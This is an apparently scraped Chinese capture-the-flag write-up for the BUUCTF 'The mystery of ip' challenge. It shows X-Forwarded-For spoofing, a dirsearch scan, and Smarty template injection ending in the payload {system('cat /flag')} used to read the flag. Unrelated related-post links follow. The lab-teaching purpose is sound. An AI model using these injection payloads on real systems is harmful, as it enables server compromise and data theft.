BUUCTF WEB [BJDCTF2020]The mystery of ip

  • 在hint.php中找到一句注释

    <!-- Do you know why i know your ip? -->

  • 在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头

    X-Forwarded-For: 127.0.0.1

    回显为

    Your IP is : 127.0.0.1

    说明我们获得了可控变量

  • 尝试命令注入失败,到这里就没什么思路了,尝试dirsearch看能不能获得什么信息

    # Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/200     6KB  http://node4.buuoj.cn:28825/.DS_Store
301   169B   http://node4.buuoj.cn:28825/css    -> REDIRECTS TO: http://node4.buuoj.cn/css/
200     2KB  http://node4.buuoj.cn:28825/flag.php
200   938B   http://node4.buuoj.cn:28825/header.php
301   169B   http://node4.buuoj.cn:28825/img    -> REDIRECTS TO: http://node4.buuoj.cn/img/
301   169B   http://node4.buuoj.cn:28825/libs    -> REDIRECTS TO: http://node4.buuoj.cn/libs/
301   169B   http://node4.buuoj.cn:28825/templates_c    -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/
403   555B   http://node4.buuoj.cn:28825/templates_c/

    发现一个名为/template_c/ 的文件夹,怀疑存在模板注入

  • 将X-Forwarded-For改为

    X-Forwarded-For: {6*6}

    回显为

    Your IP is : 36

  • 尝试直接读取flag文件

    X-Forwarded-For: {system('cat /flag')}

    回显

    Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}

BUUCTF WEB [BJDCTF2020]The mystery of ip相关推荐

  1. BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此

    BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此 进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...

  2. BUUCTF Web 第二页全部Write ups

    更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...

  3. Buuctf -web wp汇总(一)

    Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...

  4. Buuctf -web wp汇总(三)

    Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...

  5. java web ip_详解Java Web如何限制访问的IP的两种方法

    前一阵子因为在做项目时碰到了这个功能,现在好好总结一下,至于为什么要限制IP访问,我就不多说了.然后百度了一下,现在主要有两种方式去限制IP访问,第一种是最简单的方便的,第二种是通过过滤器来限制访问. ...

  6. BUUCTF Web 极客大挑战 2019 EasySQL

    BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...

  7. BUUCTF WEB [BSidesCF 2020]Had a bad day

    BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...

  8. BUUCTF WEB [极客大挑战 2019]LoveSQL

    BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...

  9. 远程服务器ip地址可以更改吗,Web远程管理服务器端的IP地址如何进行设置?

    通过Web远程管理可以对服务器进行很多设置.而"远程桌面"是Windows Server 2003较Windows 2000 Server比较明显的改进,用户可以通过Web远程管理 ...

最新文章

  1. 浅拷贝和深拷贝的应用
  2. linux 下 select 函数的用法
  3. pythontkinter控件单选框怎么判断是否被选中_Python GUI编程(Tkinter)Radiobutton单选框控件...
  4. (转)mybatis常用jdbcType数据类型
  5. sorl6.0+jetty+mysql搭建solr服务
  6. 加了密的PDF如何破解复制?
  7. mysql主键设置after_mysql如何改变主键属性
  8. 创建struct fib_info
  9. python批量上传执行脚本_python 写的批量操作远程主机脚本(命令执行,上传、下载文件)...
  10. 批量激活管理工具VAMT 3.0的安装与基本使用方法简介
  11. git推送代码的命令详解
  12. 使用Doxygen + graphviz生成Unity 3d的UGUI类图
  13. 使用 Kotlin , Groovy ,Java 开发一个自己的 Gradle 插件
  14. 夜场票为何一票难求?故宫院长在彩排现场解答观众
  15. blender icons 图标
  16. 冲突域和广播域,中继器、集线器、网桥、交换机、路由器和网关
  17. 【Hexo搭建个人博客】:yilia主题配置(三) - 评论系统
  18. Bugku-CTF (web 持续更新) ——新手ctf记录
  19. Learning to Compare Image Patches via Convolutional Neural Networks
  20. 女人的这三个“动作”,才更加让男人心动

热门文章

  1. [ATF]-中断配置:SCR.FIQ/SCR.IRQ的配置详解
  2. 使用Hashcat破解Windows系统账号密码
  3. Macbook pro提示已损坏,无法打开。您应该将它移到废纸篓
  4. WakeOnLAN(WOL)测试
  5. 如何在github上搭建自己的个人主页
  6. 全国职业院校技能大赛网络安全竞赛之数据分析数字取证-A
  7. java uml建模_Java开源UML建模
  8. 视频大怎么发到微信?怎样将大视频发到微信?
  9. 单片机设计0~99.99秒的计时器
  10. 微软新版edge浏览器设置用户目录和插件白名单